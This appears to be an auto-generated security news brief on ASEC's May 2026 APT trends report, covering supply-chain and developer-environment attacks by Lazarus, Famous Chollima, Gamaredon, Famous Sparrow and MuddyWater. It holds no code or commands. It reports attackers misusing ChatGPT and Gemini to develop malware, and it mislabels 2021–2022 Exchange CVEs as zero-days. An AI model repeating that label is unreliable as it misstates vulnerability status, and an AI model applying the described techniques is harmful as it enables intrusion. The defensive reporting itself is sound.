Answer Brief
ASEC’s May 2026 APT report identifies supply chain, developer environment, and runtime abuse as dominant trends, with Lazarus exploiting Git hooks and CI/CD pipelines, Famous Chollima poisoning npm/Packagist branches, and MuddyWater leveraging Microsoft Teams and Quick Assist for credential theft. Groups like Gamaredon and UAC-0010 abused WinRAR CVE-2025-8088 against Ukrainian entities, while Chinese APTs targeted Azerbaijani energy firms via Exchange zero-days. The report underscores credential and session theft, cryptocurrency wallet targeting, and persistent remote access as common objectives across government, defense, diplomacy, energy, education, and telecom sectors.
Signal Timeline
A quick visual path for analysts before reading the full brief.
- 1
ASEC publishes May 2026 APT group trends report highlighting supply chain, developer environment, and runtime exploitation as key attack vectors.
- 2
Lazarus observed using Git hooks and Jenkins CI/CD to infect development flows, deploying InvisibleFerret, Beavertail, and FCCCall to steal cryptocurrency wallets and developer credentials.
- 3
Famous Chollima compromised npm and Packagist development branches, using Cloudflare Workers and blockchain RPC as dead drops for payload delivery.
- 4
Gamaredon (UAC-0010) exploited WinRAR CVE-2025-8088 to target Ukrainian government, judiciary, and security entities, using NTFS ADS and Startup folder for persistent GammaDrop and GammaLoad installation.
Executive Summary: ASEC’s May 2026 APT report identifies supply chain, developer environment, and runtime abuse as dominant trends, with Lazarus exploiting Git hooks and CI/CD pipelines, Famous Chollima poisoning npm/Packagist branches, and MuddyWater leveraging Microsoft Teams and Quick Assist for credential theft. Groups like Gamaredon and UAC-0010 abused WinRAR CVE-2025-8088 against Ukrainian entities, while Chinese APTs targeted Azerbaijani energy firms via Exchange zero-days. The report underscores credential and session theft, cryptocurrency wallet targeting, and persistent remote access as common objectives across government, defense, diplomacy, energy, education, and telecom sectors.
Why It Matters
ASEC’s May 2026 APT group trends report marks a clear evolution in adversary tactics, with supply chain compromise, developer environment infiltration, and runtime environment abuse emerging as central themes across multiple threat actors. The report emphasizes that attackers are no longer relying solely on traditional phishing or exploit chains but are instead embedding malicious code into trusted development workflows—such as Git hooks and CI/CD pipelines—to achieve stealthy, persistent access. This shift reflects a broader trend of living-off-the-land and abuse of legitimate infrastructure, where attackers leverage tools and services already present in target environments to evade detection. Notably, the abuse of developer ecosystems is not limited to a single actor but is observed across geographically and ideologically diverse groups, indicating a convergent evolution in TTPs driven by the increasing value of developer credentials, source code, and build systems as pivot points for wider network compromise.
Lazarus’s use of Git hooks and Jenkins CI/CD to deploy malware like InvisibleFerret and Beavertail represents a significant escalation in supply chain risk. By triggering malicious code execution on routine developer actions—such as committing code or checking out branches—Lazarus transforms the development environment itself into an infection vector. This approach enables the theft of cryptocurrency wallets and developer credentials, which can then be used to sign malicious code, poison internal packages, or gain access to internal repositories. The targeting of developer environments is particularly concerning given the trust placed in these systems and the potential for downstream impact on software supply chains, especially when compromised code is integrated into production builds.
Technical Signal
Famous Chollima’s tactics further illustrate the sophistication of modern supply chain attacks. By compromising only the development branches of legitimate npm and Packagist packages—rather than publishing malicious versions to public registries—the group avoids detection by standard package integrity checks. The use of Cloudflare Workers and blockchain RPC as dead drops for payload retrieval adds a layer of resilience and anonymity, allowing the group to update or retrieve malware without maintaining persistent C2 infrastructure that could be traced or blocked. This method exemplifies how APTs are blending traditional malware delivery with decentralized and ephemeral infrastructure to enhance operational security.
The report also highlights the continued exploitation of zero-day and n-day vulnerabilities, particularly in widely deployed enterprise software. Gamaredon’s abuse of CVE-2025-8088 in WinRAR against Ukrainian government and security entities demonstrates how even seemingly low-risk utilities can be weaponized when combined with persistence mechanisms like NTFS ADS and Startup folder execution. Similarly, Famous Sparrow’s chaining of multiple Exchange zero-days (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2022-41040, CVE-2022-41082) to breach Azerbaijani oil and gas firms underscores the enduring risk of unpatched or delayed-patch environments in critical infrastructure sectors. The deployment of web shells, DLL side-loading, Deed RAT, and Terndoor for long-term access and lateral movement reflects a mature post-exploitation lifecycle focused on persistence and data collection.
Operational Impact
MuddyWater’s activities showcase a blended approach to social engineering and technical exploitation. By combining Microsoft Teams-based lures, Quick Assist phishing, and the abuse of legitimate remote tools like AnyDesk and DWAgent, the group effectively bypasses traditional email-centric defenses. The use of Game.exe RAT for data exfiltration, alongside DLL side-loading and Node.js/PowerShell chains for reconnaissance and privilege escalation, indicates a flexible, modular toolkit adapted to target environments. This mirrors broader trends in APT operations where legitimate remote management tools are repurposed for malicious use, reducing reliance on custom malware that might trigger antivirus or EDR alerts.
Other notable trends include the abuse of generative AI platforms like Ideogram AI, ChatGPT, and Gemini for creating bait content and developing malware, as observed in GREYVIBE’s campaigns. This reflects a growing interest in leveraging AI to enhance the credibility of lures and accelerate malware development cycles. Similarly, groups like OceanLotus and Webworm are increasingly abusing legitimate cloud and collaboration platforms—such as Zulip REST API, Microsoft Graph API, GitHub, and compromised Amazon S3 buckets—for C2 and payload distribution, further blurring the line between malicious and benign traffic.
What To Watch
The geographic and sectoral targeting described in the report remains consistent with historical patterns: government, defense, diplomacy, energy, education, and telecom sectors are repeatedly targeted, often with overlapping objectives of intelligence gathering, credential harvesting, and access maintenance. The inclusion of cryptocurrency-related targets, particularly in Lazarus’s operations, highlights the financial motivation intertwined with traditional espionage goals. The report concludes that the convergence of supply chain attacks, developer environment compromise, runtime abuse, and legitimate tool misuse has made detection significantly more challenging, necessitating a shift toward behavior-based monitoring, developer environment hardening, and stricter controls on CI/CD pipelines and package integrity.
For global security teams, the May 2026 APT trends serve as a critical reminder that securing the software development lifecycle is no longer optional but a core component of cyber resilience. Organizations must monitor for anomalous Git hook activity, enforce strict CI/CD pipeline controls, validate package integrity across development and production branches, and monitor for abuse of legitimate cloud and remote management tools. The report’s findings reinforce the need for runtime protection, memory-based threat detection, and continuous monitoring of trusted execution environments to counter increasingly stealthy, abuse-based attack chains.
Event Type: security
Importance: high
Affected Companies
- Amazon S3
- AnyDesk
- Cloudflare
- DWAgent
- Discord
- Dropbox
- GitHub
- GitLab
- JetBrains
- Microsoft
- OneDrive
- Packagist
- Telegram
- VSCode
- Zoom
- npm
Affected Sectors
- Cloud Services
- Cryptocurrency
- Defense
- Diplomacy
- Education
- Energy
- Government
- Software Development
- Telecommunications
Timeline
- ASEC publishes May 2026 APT group trends report highlighting supply chain, developer environment, and runtime exploitation as key attack vectors.
- Lazarus observed using Git hooks and Jenkins CI/CD to infect development flows, deploying InvisibleFerret, Beavertail, and FCCCall to steal cryptocurrency wallets and developer credentials.
- Famous Chollima compromised npm and Packagist development branches, using Cloudflare Workers and blockchain RPC as dead drops for payload delivery.
- Gamaredon (UAC-0010) exploited WinRAR CVE-2025-8088 to target Ukrainian government, judiciary, and security entities, using NTFS ADS and Startup folder for persistent GammaDrop and GammaLoad installation.
- Famous Sparrow exploited multiple Exchange zero-days (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2022-41040, CVE-2022-41082) to breach Azerbaijani oil and gas firms, deploying web shells, DLL side-loading, Deed RAT, and Terndoor for long-term access.
- MuddyWater combined Microsoft Teams social engineering, Quick Assist phishing, AnyDesk, DWAgent, and Game.exe RAT for data theft and exfiltration, alongside DLL side-loading and Node.js/PowerShell chains for reconnaissance and credential theft.
Frequently Asked Questions
What are the key APT trends highlighted in ASEC’s May 2026 report?
The report identifies supply chain attacks, developer environment compromise, and runtime abuse as dominant trends. APT groups are increasingly infecting Git hooks, CI/CD pipelines, and legitimate update mechanisms to establish persistence and steal credentials, cryptocurrency wallets, and session data.
How is Lazarus exploiting developer environments in May 2026 according to ASEC?
Lazarus abused Git hooks (pre-commit, post-checkout) and Jenkins CI/CD pipelines to inject malware like InvisibleFerret, Beavertail, and FCCCall into development flows, targeting cryptocurrency wallets and developer credentials for theft.
Which vulnerability did Gamaredon (UAC-0010) exploit in May 2026, and against whom?
Gamaredon (UAC-0010) exploited the WinRAR vulnerability CVE-2025-8088 to target Ukrainian government, judiciary, and security institutions, using NTFS ADS and the Startup folder to automatically install GammaDrop and GammaLoad malware.
How did Famous Chollima use blockchain infrastructure in its May 2026 attacks?
Famous Chollima used blockchain RPC infrastructure as a dead drop to deliver payloads while poisoning npm and Packagist development branches, enabling stealthy payload retrieval without direct C2 communication.
What common objectives did APT groups share across sectors in May 2026?
Credential theft, cryptocurrency wallet and session data exfiltration, browser data harvesting, and persistent remote access were consistent objectives across government, defense, diplomacy, energy, education, and telecom sectors targeted by APT groups in May 2026.